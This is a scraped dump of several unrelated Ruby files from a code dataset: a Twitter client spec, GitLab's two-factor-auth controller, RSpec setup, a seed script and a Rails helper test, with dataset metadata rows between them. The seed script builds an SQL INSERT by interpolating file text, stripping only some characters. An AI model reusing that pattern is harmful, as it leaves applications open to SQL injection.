stub_request(:get, 'https://cdn.api.twitter.com/1/urls/count.json').with(query: {url: 'http://twitter.com'}).to_return(body: fixture('count.json'), headers: {content_type: 'application/json; charset=utf-8'})
end
it 'requests the correct resource' do
@client.tweet_count('http://twitter.com')
expect(a_request(:get, 'https://cdn.api.twitter.com/1/urls/count.json').with(query: {url: 'http://twitter.com'})).to have_been_made
end
it 'returns a Tweet count' do
tweet_count = @client.tweet_count('http://twitter.com')
expect(tweet_count).to be_an Integer
expect(tweet_count).to eq(13_845_465)
end
context 'with a URI' do
it 'requests the correct resource' do
uri = URI.parse('http://twitter.com')
@client.tweet_count(uri)
expect(a_request(:get, 'https://cdn.api.twitter.com/1/urls/count.json').with(query: {url: 'http://twitter.com'})).to have_been_made
end
end
end
end
| 55.394231 | 229 | 0.685645 |
26e7e93533ef84b995c1a23e8696ac87b64cf1f8 | 3,562 | class Profiles::TwoFactorAuthsController < Profiles::ApplicationController
skip_before_action :check_2fa_requirement
def show
unless current_user.otp_secret
current_user.otp_secret = User.generate_otp_secret(32)
end
unless current_user.otp_grace_period_started_at && two_factor_grace_period
current_user.otp_grace_period_started_at = Time.current
end
current_user.save! if current_user.changed?
if two_factor_authentication_required? && !current_user.two_factor_enabled?
if two_factor_grace_period_expired?
flash.now[:alert] = 'You must enable Two-Factor Authentication for your account.'
else
grace_period_deadline = current_user.otp_grace_period_started_at + two_factor_grace_period.hours
flash.now[:alert] = "You must enable Two-Factor Authentication for your account before #{l(grace_period_deadline)}."
end
end
@qr_code = build_qr_code
@account_string = account_string
setup_u2f_registration
end
def create
if current_user.validate_and_consume_otp!(params[:pin_code])
current_user.otp_required_for_login = true
@codes = current_user.generate_otp_backup_codes!
current_user.save!
render 'create'
else
@error = 'Invalid pin code'
@qr_code = build_qr_code
setup_u2f_registration
render 'show'
end
end
# A U2F (universal 2nd factor) device's information is stored after successful
# registration, which is then used while 2FA authentication is taking place.
def create_u2f
@u2f_registration = U2fRegistration.register(current_user, u2f_app_id, u2f_registration_params, session[:challenges])
if @u2f_registration.persisted?
session.delete(:challenges)
redirect_to profile_two_factor_auth_path, notice: "Your U2F device was registered!"
else
@qr_code = build_qr_code
setup_u2f_registration
render :show
end
end
def codes
@codes = current_user.generate_otp_backup_codes!
current_user.save!
end
def destroy
current_user.disable_two_factor!
redirect_to profile_account_path
end
def skip
if two_factor_grace_period_expired?
redirect_to new_profile_two_factor_auth_path, alert: 'Cannot skip two factor authentication setup'
else
session[:skip_tfa] = current_user.otp_grace_period_started_at + two_factor_grace_period.hours
redirect_to root_path
end
end
private
def build_qr_code
uri = current_user.otp_provisioning_uri(account_string, issuer: issuer_host)
RQRCode.render_qrcode(uri, :svg, level: :m, unit: 3)
end
def account_string
"#{issuer_host}:#{current_user.email}"
end
def issuer_host
Gitlab.config.gitlab.host
end
# Setup in preparation of communication with a U2F (universal 2nd factor) device
# Actual communication is performed using a Javascript API
def setup_u2f_registration
@u2f_registration ||= U2fRegistration.new
@u2f_registrations = current_user.u2f_registrations
u2f = U2F::U2F.new(u2f_app_id)
registration_requests = u2f.registration_requests
sign_requests = u2f.authentication_requests(@u2f_registrations.map(&:key_handle))
session[:challenges] = registration_requests.map(&:challenge)
gon.push(u2f: { challenges: session[:challenges], app_id: u2f_app_id,
register_requests: registration_requests,
sign_requests: sign_requests })
end
def u2f_registration_params
params.require(:u2f_registration).permit(:device_response, :name)
end
end
| 31.245614 | 124 | 0.744526 |
1a267eeb566504d47bb94390fbce9ced29290736 | 506 | # frozen_string_literal: true
require "rspec"
require "rack/test"
require "rack/ecg"
RSpec.configure do |config|
config.expect_with(:rspec) do |expectations|
expectations.include_chain_clauses_in_custom_matcher_descriptions = true
end
config.mock_with(:rspec) do |mocks|
mocks.verify_partial_doubles = true
end
config.disable_monkey_patching!
config.warnings = true
config.include(Rack::Test::Methods)
def json_body
@json_body ||= JSON.parse(last_response.body)
end
end
| 20.24 | 76 | 0.758893 |
ed9b2974fc11c9684af87c70a3836addce60f3c5 | 531 | require 'csv'
# file = File.open('db/urls', 'r')
# file.each_line do |row|
# puts row
# end
inserts= []
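# Build one VALUES tuple per URL: the cleaned long URL, a random 16-character
# hex short code, a zero click count, and creation/update timestamps.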
file = File.open('db/urls', 'r')
file.each do |row|
# row = (http://example.com/fb3b726804f824a9185c57530e),
#
inserts << "('#{row.chomp.tr(',();', '')}', '#{SecureRandom.hex(8)}', 0, '#{Time.now}', '#{Time.now}' )"
# ('www.google.com', 'adsfqwer', 0)
end
sql = "INSERT INTO urls (long_url, short_url, click_count, created_at, updated_at) VALUES " + inserts.join(', ')
Url.connection.execute sql | 35.4 | 112 | 0.608286 |
f74c86c68999688c1736c18f76f5729602911b4d | 597 | require 'test_helper'
class ProtectedAreasHelperTest < ActionView::TestCase
test '#map_bounds, given a ProtectedArea object, returns a hash containing
its bounds' do
pa = FactoryGirl.create(:protected_area)
pa.expects(:bounds).twice.returns([[0,0], [1,1]])
assert_equal map_bounds(pa), {'from' => [0,0], 'to' => [1,1]}
end
test '#map_bounds, given no arguments, returns a hash containing
the default bounds' do
Rails.application.secrets.default_map_bounds = {'from' => [1,1], 'to' => [1,2]}
assert_equal map_bounds, {'from' => [1,1], 'to' => [1,2]}
end
end
| 29.85 | 84 | 0.664992 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.